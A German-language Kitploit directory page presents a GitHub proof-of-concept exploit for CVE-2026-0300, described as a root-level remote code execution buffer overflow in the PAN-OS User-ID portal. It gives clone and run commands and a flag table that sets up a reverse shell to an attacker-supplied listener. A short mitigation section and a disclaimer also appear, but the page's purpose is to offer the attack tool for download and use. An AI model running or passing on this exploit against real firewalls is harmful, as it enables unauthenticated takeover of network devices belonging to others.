Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Proof-of-Concept für CVE-2026-0300, einen kritischen Pufferüberlauf im PAN-OS User-ID-Portal, der eine nicht authentifizierte Remote-Codeausführung mit Root-Rechten ermöglicht.

Repository anzeigen
2111vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2026-0300: PAN-OS User-ID™ Portal RCE-Analyse

Forschungs-PoC: CWE-787 Out-of-bounds Write

Security Python License Dependencies

📌 Übersicht

CVE-2026-0300 ist eine schwerwiegende Pufferüberlauf-Schwachstelle, die im Palo Alto Networks PAN-OS User-ID™-Authentifizierungsportal (Captive Portal) identifiziert wurde. Dieses Forschungs-Repository demonstriert die technische Logik der Schwachstelle und konzentriert sich insbesondere darauf, wie ein nicht authentifiziertes Netzwerkpaket zu Remote Code Execution (RCE) mit Root-Rechten führen kann.


📊 Schwachstellen-Analyse

MerkmalDetails
CVE-IDCVE-2026-0300
Schweregrad-Score9.3 (Kritisch)
SchwachstellentypCWE-787: Out-of-bounds Write
AngriffsvektorNetzwerk (Nicht authentifiziert)
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
Betroffene SoftwarePAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Technischer Mechanismus

Die Schwachstelle tritt auf, wenn der Dienst des User-ID-Authentifizierungsportals die Länge eingehender Daten vor dem Schreiben in einen Speicherpuffer nicht validiert.

  1. Der Puffer: Der Dienst weist einen Speicherbereich fester Größe für die Verarbeitung von Portal-Anfragen zu.
  2. Der Überlauf: Eine speziell präparierte POST-Anfrage sendet eine Nutzlast, die diese Größe überschreitet.
  3. Das Überschreiben: Überschüssige Daten überschreiben den Stack/Heap und ermöglichen es dem Angreifer, den Instruction Pointer (EIP/RIP) zu kontrollieren und beliebigen Shellcode auszuführen.

🛠️ Installation & Einrichtung

1. Voraussetzungen

  • Python 3.9 oder höher.
  • Keine externen Bibliotheken erforderlich (Verwendet die Standardmodule socket, struct und argparse).

2. Klonen des Forschungstools

Repository klonen

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

In den Ordner wechseln

root@kitploit:~
cd CVE-2026-0300-POC

Das Skript ausführbar machen

root@kitploit:~
chmod +x research_poc.py

🚀 Verwendungsanleitung

Dieses Tool ist mit einer professionellen CLI (Command Line Interface) ausgestattet.

Grundlegender Befehl

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

Erweiterte Parameter

FlagNameBeschreibungStandard
-t--target(Erforderlich) Ziel-IP-Adresse der Firewall.N/A
-p--portDer Port, auf dem das User-ID-Portal läuft.6082
-o--offsetDie Bytelänge, um den Speicherüberlaufpunkt zu erreichen.2048
-r--retDie hexadezimale Rücksprungadresse.0xdeadbeef
-l--lhostReverse-Shell-IP-AdresseIhre IP
-L--lportIhr Listener-Port4444

🛡️ Gegenmaßnahmen & Sicherheit

  • PAN-OS aktualisieren: Installieren Sie die neuesten Sicherheitspatches (veröffentlicht Mai 2026).
  • IP-Einschränkung: Beschränken Sie den Portalzugriff auf vertrauenswürdige interne IP-Zonen.
  • Portal deaktivieren: Wenn die User-ID-Authentifizierung nicht benötigt wird, deaktivieren Sie die Funktion.

⚠️ Ethischer & rechtlicher Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE FORSCHUNG. Nicht autorisierte Tests gegen Systeme, die Ihnen nicht gehören, sind illegal. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Forschungscodes. Verwenden Sie ihn verantwortungsvoll, um die globale Sicherheit zu verbessern. Entwickelt von: https://t.me/p3Nt3st3rsTAr Datum der Schwachstellenentdeckung: 07. Mai 2026

Tool herunterladen